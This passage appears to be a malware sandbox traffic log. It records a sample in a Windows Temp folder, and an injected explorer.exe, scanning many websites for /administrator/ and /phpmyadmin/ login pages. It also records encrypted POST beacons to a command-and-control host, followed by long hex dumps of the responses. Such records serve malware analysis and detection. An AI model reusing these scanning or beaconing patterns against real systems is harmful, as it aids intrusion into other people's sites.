                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.697694063 CET148INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                location: https://www.hugedomains.com/domain_profile.cfm?d=hokal.com


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                68192.168.2.45427254.161.222.85805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.543826103 CET173OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: hokal.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.696265936 CET148INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:26 GMT
                                                                                                                                                                                                                                                                                                                                location: https://www.hugedomains.com/domain_profile.cfm?d=hokal.com


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                69192.168.2.45432068.233.46.109805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.579263926 CET179OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: brightright.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.745345116 CET460INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:26 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.748492956 CET236OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: brightright.com
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://brightright.com/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.915968895 CET460INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:26 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Length: 315
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                70192.168.2.453976180.94.156.61802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.604959011 CET283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Referer: http://lyljjqxhhpwe.net/
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                Content-Length: 120
                                                                                                                                                                                                                                                                                                                                Host: humydrole.com
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.605076075 CET120OUTData Raw: 3b 6e 24 61 f2 c2 6a 52 ae d9 c4 70 73 77 08 b7 0e 78 c0 97 62 01 90 10 01 0b 08 e7 44 c3 ce 68 9d 29 b5 5b 71 1a 2b 6a ea 9c 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 25 17 a0 98
                                                                                                                                                                                                                                                                                                                                Data Ascii: ;n$ajRpswxbDh)[q+j? 9Yt M@NA -[k,vu%SZYRf'odvrJ*
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.613114119 CET587INHTTP/1.0 404 Not Found
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.15
                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                71192.168.2.454299217.160.223.67805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.635948896 CET170OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: elossa.de
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.883867979 CET587INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=15
                                                                                                                                                                                                                                                                                                                                Date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                Data Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                72192.168.2.45436592.240.253.14805304C:\Users\user\AppData\Local\Temp\8F78.exe
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.721806049 CET178OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: instalanova.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.003974915 CET119INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:27 GMT
                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                x-bver: v2
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.004264116 CET234OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: instalanova.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Referer: http://instalanova.sk/administrator/
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:28.261497021 CET119INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                content-type: text/html
                                                                                                                                                                                                                                                                                                                                x-bver: v2


                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                73192.168.2.454387193.163.77.680
                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:27.775461912 CET176OUTGET /administrator/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                Host: janckulik.sk
                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.127351999 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                set-cookie: PHPSESSID=hg0s2enuefjtdt9jcr0vlbien2; path=/
                                                                                                                                                                                                                                                                                                                                expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                                                                                                                                                vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                content-length: 19237
                                                                                                                                                                                                                                                                                                                                date: Thu, 21 Dec 2023 04:03:28 GMT
                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed bd 4b 93 1b 47 96 26 ba 26 cd e6 3f 78 41 56 56 92 4d 46 26 02 cf 4c 8a cc 1a 8a d4 ab 54 a4 68 22 8b 66 53 0f 83 39 22 1c 40 24 e2 81 8a 07 48 a4 46 8b 7b 57 bd a8 9a d9 cf aa d3 ac b5 90 d9 68 55 bd 92 99 b4 68 30 ff c8 fd 25 f7 1c 77 8f 08 8f 08 c7 23 c9 0c 76 74 0f a0 2a 26 e0 8f 73 dc 3f 3f 7e fc 1c 7f de ff 95 1d 58 f1 6a c1 c8 2c f6 dc f3 bb f7 f1 0f 71 a9 3f 7d d0 8a e6 ad f3 bb 77 09 b9 3f 63 d4 3e bf 7b e7 ee 1d 42 f0 a7 c7 62 4a ac 19 0d 23 16 3f 68 25 f1 c4 38 c5 84 59 d4 2c 8e 17 06 fb 6b e2 2c 1f b4 5e 1b 09 35 ac c0 5b d0 d8 19 bb ac 45 ac c0 8f 99 0f f9 1c f6 80 d9 53 c6 73 62 d6 d8 89 5d 76 fe 68 b6 1a 53 d2 6b f7 ee 9f 88 80 8c aa 4f 3d f6 a0 65 b3 c8 0a 9d 45 ec 04 be 42 eb c5 fa a7 38 20 51 1c ae af fc 79 42 7c 87 91 0b 46 bc e0 fa 17 7f fd 03 f1 d7 57 17 d1 f5 f7 ad 32 ad 39 5b bd 0a 42 3b 52 08 f1 34 f8 91 7f f2 0f 04 dc bd 7b ff 57 86 11 c5 64 cc a6 8e 4f 0c 83 a3 53 a4 b9 74 d8 ab 45 10 c6 0a cd 57 8e 1d cf 1e d8 6c e9 58 cc e0 3f 8e 88 47 5f 3b 5e e2 19 91 45 5d f6 c0 3c 22 8e ef c4 0e 75 d3 80 e3 76 8b 9c 9c 67 0c 99 6f a7 ec ee bb 8e 3f 27 21 73 01 41 0b 41 c0 c6 83 ef 1e 9d b2 93 a5 6f 1f 7b 8e 15 06 51 30 89 8f 45 fc 2c 64 93 07 2d 6c 93 7b 27 27 17 d4 b7 e6 89 eb cc 8f a3 f9 89 e3 4d 4f 26 74 89 c9 30 ed 6f cd c1 b0 dd 3e eb f5 fb 5d 01 55 ce 29 9a 41 95 ac 24 26 55 96 af 8d 77 65 53 c6 94 43 9a f3 a6 8b 85 cb 8c 38 48 ac 99 64 15 39 97 2c 7a d0 32 4f db af e1 ff 2a eb a8 cc 3b 59 b8 01 b5 4f a2 38 9e 31 8f 31 db 89 83 f0 c4 1c 4c 7a c3 d3 f6 e4 74 7c 3a 9c 74 da 36 1b f6 7a bd 76 7b dc ee 8e ad 71 bb df 3d 5e f8 53 5e ca 4e a7 0f c5 e4 2d 21 84 60 2b f8 90 2b 2f db e0 b5 39 b8 79 c9 fa 67 6c 68 77 fa 6d da ee 9d 8e bb 66 7b 30 18 0f ac 7e e7 f4 ac 4f 4f 3b 9d 21 bd 85 92 75 3b af bb 9d 9b 97 ec 8c 5a 66 c7 1c 5a a7 80 db 70 38 9e 74 c6 74 02 ff 42 d9 3a 13 73 dc 6f ef 55 32 8f fa ce 84 45 71 ca 7e 43 f3 9c 44 4e cc 8e 5f b1 71 9a 5e 25 ac 25 1b cd 2b 52 b8 5f b5 3a 7d c6 4e c7 e6 29 54 a9 7f 36 66 43 36 19 8f fb bd 5e bf dd ed 58 a6 45 fb c7 d1 b2 58 2d 2b 70 83 f0 41 eb 03 d6 ef d9 9d 41 5e 1a 45 05 78 11 8a ac 63 51 54 52 a0 fb fc 89 33 55 d4 c1 0d e4 f4 64 1c 06 af 22 16 0a 1a c7 af 3d b7 8a 84 46 45 14 bb 6e bc 72 59 34 63 2c 2e a3 33 81 12 45 c7 d3 20 98 ba 8c 2e 9c e8 18 d4 f4 89 15 45 bf 9d 50 cf 71 57 0f 5e 06 ae 3b 0f 42 ff 5e c8 a6 89 4b c3 16 f1 a0 60 14 7a a4 eb 56 14 84 96 4b b9 96 bc 72 d1 49 1c 52 3f 9a 04 a1 c7 c2 13 1a c1 20 12 9d 58 d4 9a 31 11 6f 74 a9 6d 9f 4d 40 f8 8f a1 30 25 a6 e2 83 aa 18 d8 8b 91 40 4a 7a cc 5e c7 c0 6d 49 45 68 d6 32 84 2c 69 48 80 64 1c 58 34 8c 47 20 52 1e 6f 19 f2 80 98 1f 17 12 8d 9f 53 96 bc 08 9d e9 94 85 5f 2f 98 ff 08 1a 71 0e c9 e2 30 61 c5 94
                                                                                                                                                                                                                                                                                                                                Data Ascii: KG&&?xAVVMF&LTh"fS9"@$HF{WhUh0%w#vt*&s??~Xj,q?}w?c>{BbJ#?h%8Y,k,^5[ESsb]vhSkO=eEB8 QyB|FW29[B;R4{WdOStEWlX?G_;^E]<"uvgo?'!sAAo{Q0E,d-l{''MO&t0o>]U)A$&UweSC8Hd9,z2O*;YO811Lzt|:t6zv{q=^S^N-!`++/9yglhwmf{0~OO;!u;ZfZp8ttB:soU2Eq~CDN_q^%%+R_:}N)T6fC6^XEX-+pAA^ExcQTR3Ud"=FEnrY4c,.3E .EPqW^;B^K`zVKrIR? X1otmM@0%@Jz^mIEh2,iHdX4G RoS_/q0a
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.127413034 CET1286INData Raw: 82 d2 05 7d ad 8f c5 7c a3 c0 1f e1 b8 c9 c2 11 a6 86 84 ed 52 aa 20 98 3b 2c e2 64 46 49 e8 42 0a d9 34 7f 3e f9 73 01 b7 3f 9f 78 81 9d 00 be 7f 3e 89 66 d4 f1 46 69 56 96 54 43 38 bd e3 c5 6c d1 d2 b3 73 ec d1 34 81 3e 05 ec 3a bd 61 bf 3d 2c
                                                                                                                                                                                                                                                                                                                                Data Ascii: }|R ;,dFIB4>s?x>fFiVTC8ls4>:a=,F34po*I@Zi0O7{,.]E!"dZm-B@?1u#=1E&zAQkI?'mN:mjGo-1#0"
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.127549887 CET1286INData Raw: cb 9b b5 3e cf 6b c8 bc 29 a9 49 80 f6 f7 cd 1a 27 2f c9 36 40 d3 c4 34 e3 05 c6 69 12 6e ab f5 96 62 cb bc 29 a9 c8 75 16 5b 08 d9 c1 38 0c 16 0e ef c9 45 6b 64 73 3d 51 35 cd a9 21 4c 40 90 3c b4 fe 28 cf 1f 45 68 7d 6d ad ab 0f 10 19 33 16 b9
                                                                                                                                                                                                                                                                                                                                Data Ascii: >k)I'/6@4inb)u[8Ekds=Q5!L@<(Eh}m3<=Ov8ie!f:V/'ynmrP5pqVN q(}[/WmEs1dJT5W]%GlL$aXJfPGZ!<G]l?'hzm
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.127607107 CET1286INData Raw: 12 29 31 ba a8 51 6a 08 b4 cc 3e a6 49 22 56 c9 9b 82 28 fa 95 90 61 51 a3 01 9f 45 18 7b cc 4b a2 7c db 8c 5c 65 4f 83 ad 2c 0c 89 64 03 ba e3 2f b8 e7 cd 85 86 ab 89 25 0b 71 0e db 1d 4d 9c 58 15 72 0f a7 7f f2 6a 14 c2 d0 ba 60 32 62 9c ac 46
                                                                                                                                                                                                                                                                                                                                Data Ascii: )1Qj>I"V(aQE{K|\eO,d/%qMXrj`2bF>lsrS#$GN"?eYmU$ys[BiGf`U+Gry9??"t}%3!~5ZMs|fA)}a9GjsrBd"3_C!n
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.127671003 CET1286INData Raw: 92 fb da 00 7b c2 0e 5e dd e3 ce cf c7 a4 12 52 81 8c 64 25 28 37 2c 08 08 a3 51 3a d1 3b ea 98 df 2e a8 8d a7 77 8c 38 58 80 07 23 3b e5 86 34 99 a3 a3 4b d6 dd 83 54 77 3b 29 e6 32 9c 34 19 75 3a e4 98 07 e0 26 ef 11 76 60 ae 0f 46 9d 51 4f 89
                                                                                                                                                                                                                                                                                                                                Data Ascii: {^Rd%(7,Q:;.w8X#;4KTw;)24u:&v`FQOONS:Io;Rky"j^->-(qu?2[%;I+-ROnTB~B%!^BB/B/F*;)'[%;I+-ROnTB
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.127727985 CET1286INData Raw: 85 cc c7 13 97 4e 47 e6 bd 31 9b 04 21 03 57 7a 67 da 8e 4c ab 8e f5 99 63 6c 9b c3 ce c7 c5 21 bd 18 57 2e 7a c9 b1 de 92 46 08 b8 70 6e 0b f1 b9 e1 2d ba 03 b5 9d 24 ba 47 b8 b3 22 4d ec 6a 84 2e ac 44 57 30 1c 68 62 a4 e5 cc a3 54 87 b9 cf 67
                                                                                                                                                                                                                                                                                                                                Data Ascii: NG1!WzgLcl!W.zFpn-$G"Mj.DW0hbTgj[e*=9"JH]@!71/cG~>I,t5j1h6kyYdx+]tg7h0sgmY*WKDvITL!B+uw2H+uS*>EST{W
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.127929926 CET860INData Raw: e2 85 6d b8 98 80 28 17 13 10 3e ff 25 30 ba 88 0c b1 75 dd 98 04 56 12 91 0d f7 17 08 37 87 37 93 5a 4a dc 28 9d b7 3c 30 4b 91 24 d5 3b 15 90 15 37 83 04 a7 b4 6a 51 56 a3 16 01 17 da 62 b3 00 5b f2 41 eb 8b 37 bf e0 fb 6e eb 9f d3 3b 64 95 32
                                                                                                                                                                                                                                                                                                                                Data Ascii: m(>%0uV77ZJ(<0K$;7jQVb[A7n;d25$[SL5NX!7#>!pA3`TLbq\{yQb;J;A=dQI/F]@!h'w`E&qYC~
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.128031969 CET1286INData Raw: 39 e7 c9 02 8d 55 29 bf f8 22 f0 22 5c 5f 5d da 7e 66 71 14 c8 c9 29 db f2 bf 95 ee ad 1b 69 37 fa b6 5b 67 93 aa 3f 48 71 36 08 94 fb 1d be 9a 71 22 44 4e 2c 6d 48 fb 88 af 94 94 9c 8d ea 79 88 74 a0 94 4b 2a 98 9e 62 df 13 d3 e5 85 a7 81 f9 08
                                                                                                                                                                                                                                                                                                                                Data Ascii: 9U)""\_]~fq)i7[g?Hq6q"DN,mHytK*be*\Q)"I&%}7A@T3=Cgr-i}YmP^~uNN'clQ1I?_g!*zTbXW]ka\4UY\p7mteQ%%Y.C,UE
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:03:29.128112078 CET1286INData Raw: bc f7 6f ff dc ee 75 4f 48 bf df 69 b7 cd 36 97 39 91 e4 d3 27 0f bf fc fd 3d 69 fe f9 f4 bf a9 3d 4f 49 f6 f0 f1 37 9f 3e 7f 78 8f 7c b1 74 d8 a5 1d 44 2e a8 e0 25 9f 69 f1 8e 49 a7 6d 1e 91 76 e7 8c b4 4d f2 14 42 18 f4 84 65 a0 e4 fe fa c5 cb
